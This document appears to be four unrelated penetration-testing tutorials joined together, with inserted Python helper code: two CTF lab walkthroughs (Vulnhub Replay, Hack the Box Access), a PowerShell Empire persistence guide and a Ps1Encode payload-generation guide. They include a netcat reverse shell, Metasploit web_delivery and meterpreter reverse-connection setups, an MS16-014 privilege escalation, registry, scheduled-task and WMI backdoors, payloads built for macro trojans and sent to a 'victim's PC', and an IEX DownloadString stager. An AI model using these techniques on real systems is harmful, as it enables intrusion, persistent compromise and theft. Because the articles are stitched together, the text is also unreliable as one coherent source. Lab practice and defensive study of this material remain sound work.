Replay: 1: Vulnhub Lab Walkthrough


Hello friends! Today we are going to take on another boot2root challenge, “Replay: 1”. Credit for making this VM goes to “c0rruptedb1t”; our goal is to get root access and read the flag. You can download this VM here.

Security Level: Intermediate
Flags: There is one flag (flag.txt).

Penetrating Methodology:
·        IP Discovery using netdiscover
·        Network scanning (Nmap)
·        Surfing the HTTP service on port 80
·        Enumerating password from Source code.
·        Enumerating robots.txt and finding zip file
·        Unzipping zip file
·        Enumerating password from binary file
·        Enumerating the hard coded command
·        Editing the hardcoded command
·        Getting a reverse shell
·        Enumerating password for user
·        Elevate Privileges to get root
·        Getting Flag

Walkthrough
Let’s start off with scanning the network to find our target.

netdiscover


We found our target –> 192.168.1.37
Our next step is to scan our target with nmap.

nmap -p- -A 192.168.1.37


The nmap output shows three open ports: 22 (SSH), 80 (HTTP) and 1337 (an unidentified service).
Since port 80 is serving HTTP, we open the IP in our browser.


We take a look at the source code of the web page and, right at the top, find a string inside an HTML comment. We cannot do anything with it yet, so we save it for later.


The nmap scan also shows one entry in robots.txt. We open robots.txt and find a disallowed entry, “/bob_db.zip”.


We open the link and download the zip file from the web server. After extracting it we find a 64-bit ELF binary and a text file. The text file contains nothing of use.


When we run the application “client.bin”, it asks for an IP address and a password.


Since we have no clue about the password, we check the strings inside the binary and find a hint: the second half of the password is stored in it. The odd string we found earlier in the web page's source turns out to be the first half.
Password: qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul


We join the two halves and use the result as the password for the application. After entering it we are logged in and are apparently allowed to run commands, but as soon as we type one we get an error stating that we are sending unauthorized packets, and the connection is closed.


Taking a closer look at the binary, we find that the command “;whoami” is hardcoded in it: whatever we type, the client sends that string.


We try to edit the binary and change the “;whoami” command to something else, and find two constraints: the string must keep exactly the same byte length (inserting or deleting bytes shifts every offset after it and breaks the binary), and the command must still begin with a semicolon. So we changed “;whoami” to “;uname -a”, overwriting existing characters in place so that the total number of bytes in the binary stays the same.


Now when we run the application and give the password we are successfully able to execute our command.


Now we replace the whole string with a netcat reverse-shell one-liner and pad it with harmless extra commands so that the byte length, and therefore the size of the binary, stays the same:

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;


Now we run the patched application and give it the correct password.


With our listener already running, we receive a reverse shell. We then spawn a proper TTY using python.

nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'


Enumerating the directories, inside “~/Documents/.ftp” we find a file called “users.passwd” that contains the password for the user “bob”. We then check the sudoers list and find that bob can run all commands as root:

sudo -l


Since we have bob's password, we spawn a root shell, go to “/” and find “flag.txt”, which contains the congratulatory flag.

sudo -i
cd /
cat flag.txt


Hack the Box Access: Walkthrough


Today we are going to solve another CTF challenge, “Access”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert.

Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.

Penetrating Methodologies:
·         Network scanning (nmap).
·         Logging in FTP using Anonymous Login.
·         Using strings to read contents of .mdb file.
·         Unzipping Zip file using 7z.
·         Using readpst to read the contents of .pst file.
·         Finding Login Credentials
·         Logging into Telnet.
·         Finding first flag user.txt
·         Using webdelivery module to create powershell code.
·         Getting Meterpreter.
·         Using exploit suggester of Metasploit.
·         Getting Root Access.
·         Changing Administrator password using net user.
·         Reading Our Final flag root.txt

Walkthrough
Let's start off by scanning the target with nmap.
nmap -p- -A 10.10.10.98



The first thing that catches our attention is that anonymous access to the FTP server is allowed. Let's log in and see what we find.
After logging into the FTP server we enumerate the directories and download two files, “Access Control.zip” and “backup.mdb”. They might come in handy later on.
ftp 10.10.10.98



When we tried to unzip the zip file, we found that it was password protected. So we ran strings over backup.mdb and found the password for the zip inside it:
strings backup.mdb | grep access
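The strings-and-grep step above is worth understanding rather than just running, since Access databases (Jet 4 and later) store much of their text as UTF-16LE, which plain `strings` does not show (you need `strings -el`). The following is an added example, not part of the walkthrough, that reimplements both scans over a constructed stand-in for backup.mdb; only the “Standard Jet DB” signature is real, the credentials in it are made up.

```python
# Added example (not from the walkthrough): a minimal `strings` / `strings -el`
# scan of a binary file, filtered for a keyword the way `grep access` was used.
import re
from typing import List

# Constructed stand-in for backup.mdb: "Standard Jet DB" at offset 4 is the
# real Access/Jet file signature; every other value here is made-up sample data.
SAMPLE_MDB = (
    b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 12
    + b"auth_user\x00\x01\x00engineer\x00\x02admin\x00\x03"
    + b"access control zip: Z1pP@ss-constructed\x00\x04"
    + "security".encode("utf-16-le") + b"\x00\x00"   # Jet stores text as UTF-16LE
    + b"\xff\xfe\x00\x00"
)

ASCII_RUN = rb"[\x20-\x7e]{%d,}"            # printable ASCII, min length filled in
UTF16_RUN = rb"(?:[\x20-\x7e]\x00){%d,}"    # printable ASCII in UTF-16LE


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Runs of at least `min_len` printable ASCII bytes (what `strings` prints)."""
    return [m.group().decode("ascii") for m in re.finditer(ASCII_RUN % min_len, blob)]


def extract_utf16_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """UTF-16LE runs (what `strings -el` prints); plain `strings` misses these."""
    return [m.group().decode("utf-16-le") for m in re.finditer(UTF16_RUN % min_len, blob)]


def grep_strings(blob: bytes, keyword: str, min_len: int = 4) -> List[str]:
    """Case-insensitive keyword filter over both encodings, like `strings | grep -i`."""
    kw = keyword.lower()
    found = extract_strings(blob, min_len) + extract_utf16_strings(blob, min_len)
    return [s for s in found if kw in s.lower()]


if __name__ == "__main__":
    for hit in grep_strings(SAMPLE_MDB, "access"):
        print(hit)
```

On a real file, `grep_strings(open("backup.mdb", "rb").read(), "access")` is the equivalent of the command above; if the hit list is empty, try a lower `min_len` or a different keyword before concluding the password is not stored in clear text.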



Once we have the password for Access Control.zip, it is time to unzip it. Inside is a .pst file, Outlook's Personal Storage Table format for mailbox archives. readpst converts it to .mbox:
7z x Access\ Control.zip
readpst 'Access Control.pst'
Let's read the contents of Access Control.mbox.
less 'Access Control.mbox'



In the mail we find credentials that will surely help us move ahead:
Username- security
Password- 4Cc3ssC0ntr0ller



Let's log in over Telnet with our new credentials. After enumerating the directories, we find our first flag.
telnet 10.10.10.98
dir
cd Desktop
type user.txt



Let's generate a PowerShell one-liner with Metasploit's web_delivery module (target 2 is the PowerShell target):
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploit



Now we will execute the PowerShell code generated via the web delivery module.


We have successfully got the meterpreter. Moving forward.
getuid
getsystem
sysinfo



Next we run the local exploit suggester, which lists the local privilege-escalation exploits that may apply to the victim's operating system.
use post/multi/recon/local_exploit_suggester
set session 1
exploit



We use the ms16_014_wmi_recv_notif exploit from Metasploit:
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploit
We now have SYSTEM-level access.
whoami



We looked for the final flag but could not find it from this shell, so instead we reset the Administrator password, since that lets us log in via Telnet. Note that resetting an account's password is destructive and easily noticed; it is fine in a lab, but not something you would do on a real engagement.
net user
net user Administrator Ignite@123



We log in via Telnet as Administrator and find our final flag.
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txt



Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Windows Persistence with PowerShell Empire


This is the third article in our Empire series; in it we will learn the elevated persistence methods. Each module is built around a trigger (what causes the payload to run again) and a storage option (where the payload is kept), and the available storage options differ from module to module.
All of these persistence modules are based on PowerSploit's persistence. As they are elevated persistence, they require admin access to work as intended. They have various settings, including Cleanup, which removes the backdoor and sets the machine back to its original state.
The registry method is one of the oldest persistence methods; it uses an HKLM Run key to trigger the payload. A couple of the persistence modules we show in this article offer schtasks as an option. This makes the module a bit trickier, as it sets the payload to be triggered either at DailyTime (any given time of day) or OnLogon, which triggers the payload when a user logs on. The OnLogon option shows no prompt and runs as SYSTEM.
The WMI module is the go-to persistence method. It adds a permanent WMI event subscription that fires the payload either at DailyTime (a certain time) or AtStartup. This module also runs as SYSTEM and does not depend on a user being logged in.
The persistence modules that we are going to show in this article are as follows:
·         Persistence/elevated/registry
·         Persistence/elevated/schtasks
·         Persistence/elevated/wmi
Firstly, we need an elevated session (a session with admin rights) in Empire. To learn how to get such a session, click here. As you can see in the image, high integrity is set to 1, which means we have admin privileges. Now we will use the first persistence module listed above with the following commands:
usemodule persistence/elevated/registry*
set listener http
execute


Once the above module has executed, you will automatically get your session back when the target machine is restarted, as shown in the image below:


Our next module is persistence/elevated/schtasks. This one is a bit different from the previous one, as we can choose when we want to get our session back. Again, from a session with administrator privileges, we use the following commands to activate the module:
usemodule persistence/elevated/schtasks*
set OnLogon True
set listener http
execute


Because of the OnLogon option, your session will return to you once the user logs on to their system; refer to the following image:


Lastly, we will use the persistence/elevated/wmi module with the following commands:
usemodule persistence/elevated/wmi
set Listener http
set AtStartup True
execute


As we set AtStartup to true, you get your session back as soon as the target machine starts up, as shown in the image below:

Generate Metasploit Payload with Ps1encode


In this article, we will learn about the Ps1Encode tool and how to use it to generate malicious payloads in different file formats such as HTA, EXE, etc.
Introduction
The code Ps1Encode builds on was developed by Matt Graeber, Dave Kennedy and a few others. Ps1Encode generates a malicious payload whose purpose is to give us a meterpreter session, and encodes it while generating it. This is one way of getting around whitelisting and other security controls on the target system. It is written in Ruby and lets us create a series of Metasploit-based payloads in whatever format we want. The final aim is always the same: get PowerShell running on the target and have it execute our payload.
Ps1Encode supports the following output formats:
·        raw (encoded payload only - no powershell run options)
·        cmd (for use with bat files)
·        vba (for use with macro trojan docs)
·        vbs (for use with vbs scripts)
·        war (tomcat)
·        exe (executable) requires MinGW - x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
·        java (for use with malicious java applets)
·        js (javascript)
·        js-rd32 (javascript called by rundll32.exe)
·        php (for use with php pages)
·        hta (HTML applications)
·        cfm (for use with Adobe ColdFusion)
·        aspx (for use with Microsoft ASP.NET)
·        lnk (windows shortcut - requires a webserver to stage the payload)
·        sct (COM scriptlet - requires a webserver to stage the payload)
You can download Ps1Encode from here using git clone command as shown in the image below :


Once it is downloaded, let's use the help option to check the syntax. Use the following commands:

cd ps1encode/
ls
./ps1encode.rb -h


The options we will use are:
-i : local host IP (the attacker's address the payload connects back to)
-p : local host port
-a : Metasploit payload name
-t : output format (one of the formats listed above)

Now we will generate a raw (encoded payload only) file using the following command:

./ps1encode.rb -i 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https
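Both Ps1Encode's encoded output and the PowerShell launchers that Empire's persistence modules (discussed in the previous article) plant in the registry, scheduled tasks and WMI rely on PowerShell's -EncodedCommand switch. What that switch actually expects is base64 over the UTF-16LE bytes of the script, not UTF-8, and an analyst reading a Run key or scheduled task needs to undo exactly that. The following is an added example, not code from Ps1Encode, Empire or the original article, that builds such a command and reads one back out of a captured command line; the stager text and command line in it are constructed, only the IP is the one used above.

```python
# Added example (not from Ps1Encode, Empire or this article): how a
# PowerShell -EncodedCommand argument is built, and how to recover the
# script from a command line found in a Run key, task or process list.
import base64
from typing import Optional

# Constructed stager text; the URL is an assumption, not a real payload.
SAMPLE_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.107/a.ps1')"


def encode_command(script: str) -> str:
    """-EncodedCommand expects base64 of the UTF-16LE bytes of the script.
    Encoding UTF-8 instead produces a blob PowerShell silently fails to run."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; raises ValueError on malformed input."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def _is_encoded_flag(token: str) -> bool:
    """PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc, ...).
    Unrelated switches such as -ep or -ex are not prefixes and do not match."""
    if token[:1] not in ("-", "/"):
        return False
    name = token[1:].lower()
    return name == "ec" or (len(name) >= 1 and "encodedcommand".startswith(name))


def decode_cmdline(cmdline: str) -> Optional[str]:
    """Return the decoded script carried by a command line, or None if the
    line has no encoded-command switch or the blob is not valid base64/UTF-16."""
    tokens = cmdline.split()            # base64 never contains whitespace
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            try:
                return decode_command(tokens[i + 1].strip("\"'"))
            except ValueError:          # covers binascii.Error and UnicodeDecodeError
                return None
    return None


if __name__ == "__main__":
    launcher = "powershell.exe -NoP -W Hidden -Enc " + encode_command(SAMPLE_STAGER)
    print(launcher)
    print(decode_cmdline(launcher))
```

The decoder is the half a defender uses: feed it the command line from a Run key value, a scheduled task's action or a WMI CommandLineEventConsumer, and the plaintext stager is what comes back.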


Copy the code generated by the above command into a file with the extension .bat and share it using a Python web server, which you can start with the following command:

python -m SimpleHTTPServer 80


At the same time, start a multi/handler listener matching the payload and port we chose above:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit


Once the file is executed on the victim's PC, you get your session, as shown in the image above. Next we generate the payload as an HTA file with the following command:

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t hta


The above command produces the following script; send this file to the victim's PC using the Python web server as before.


At the same time, start the multi/handler; note that the payload and port must match what we passed to Ps1Encode (reverse_tcp on 4444 this time), otherwise the connection back will never be picked up:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit



Once the file is executed on the victim's PC, you get your session, as shown in the image above. Now we generate an EXE (this requires the MinGW cross-compiler mentioned in the format list):

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe

Send this file to the victim's PC using the Python web server as before, as shown in the image above. At the same time, start the multi/handler, again matching the payload and port given to Ps1Encode:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit


In the same way, you can use Ps1Encode to generate the payload in any of the formats listed above. As you can see, it is simple and convenient to use.